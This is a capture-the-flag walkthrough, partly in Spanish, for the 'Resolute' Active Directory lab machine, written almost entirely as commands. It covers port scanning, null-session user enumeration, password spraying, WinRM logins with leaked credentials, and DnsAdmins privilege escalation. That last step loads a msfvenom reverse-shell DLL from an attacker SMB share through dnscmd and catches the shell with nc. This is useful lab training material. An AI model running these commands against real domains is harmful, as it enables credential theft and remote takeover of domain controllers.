Resolute
Hola, esta es la máquina resolute! Let’s hack!
RECON
ping -c 1 <IP>
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn <IP> -oG ports
extractports <ports>
nmap -sCV <PORTS> -oG services
AD DOMAIN DETECTION
crackmapexec smb <IP>
sudo su
nvim /etc/hosts
<IP> <DOMAIN>
RCPCLIENT NULL SESSION
rpcclient -U '' <IP> -N -c enumdomusers | grep -oP '\[.*?\]' | grep -v 0x | tr -d '[]' > users.txt
rpcclient -U '' <IP> -N -c enumdomgroups
rpcclient -U '' <IP> -N -c queryfroupmem 0x200
rpcclient -U '' <IP> -N -c queryuser 0x1f4
rpcclient -U '' <IP> -N -c querydispinfo
# OBTENEMOS PASSWORD EN UNA DESCRIPCIÓN
TGT GETNPUSERS ENUM (ASREPROAST ATTACK)
impacket-GetNPUsers MEGABANK.LOCAL/ -no-pass -usersfile users.txt
VALIDATING CREDENTIALS (PASSWORD SPRAYING)
crackmapexec smb <IP> -u users.txt -p <PASSWORD> --continue-on-success
GRANTED ACCESS MELANIE USER
crackmapexec smb <IP> -u melanie -p '<PASSWORD>'
crackmapexec winrm <IP> -u melanie -p '<PASSWORD>'
evil-winrm -i <IP> -u 'melanie' -p '<PASSWORD>'
whoami
FLAG USER.TXT
type C:\Users\melanie\Desktop\user.txt
AD LOCAL ENUM
whoami /priv
whoami /all
net group
net user
net user melanie
AD LOCAL ENUM (DIRECTORIES)
cd C:\
dir -Force
cd PSTranscripts\20191203
dir -Force
type PowerShell_transcript.RESOLUTE.0JuoBGhU.20191203063201.txt
# R_PASSWORD DE RYAN LEAKED
GRANTED ACCESS RYAN USER
crackmapexec smb <IP> -u ryan -p '<R_PASSWORD>'
crackmapexec winrm <IP> -u ryan -p '<R_PASSWORD>'
evil-winrm -i <IP> -u 'ryan' -p '<R_PASSWORD>'
whoami
AD LOCAL ENUM (DIRECTORIES)
cd Desktop
dir
type note.txt
AD LOCAL ENUM
whoami /priv
whoami /all
net group
net user
net user ryan
net localgroup
net localgroup DnsAdmins
ABUSING DNSADMINS GROUP (DNSCMD.EXE PRIVESC)
# MÁQUINA ATACANTE
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f dll -o pwned.dll
# COMPARTIMOS RECURSOS POR SMB
smbserver.py smbFolder $(pwd) -smb2support
# EN ESCUCHA PARA OBTENER REVERSE SHELL
rlwrap nc -nlvp <PORT>
# MÁQUINA VÍCTIMA
dnscmd.exe /config /serverlevelplugindll \\<IP>\smbFolder\pwned.dll
# DETENER SERVICIO DNS
sc.exe stop dns
# INICIAR SERVICIO DNS (SE DEBE EJECUTAR VARIAS VECES)
sc.exe start dns
# REVERSE SHELL OBTENIDA
whoami
FLAG ROOT.TXT
type C:\Users\Administrator\Desktop\root.txt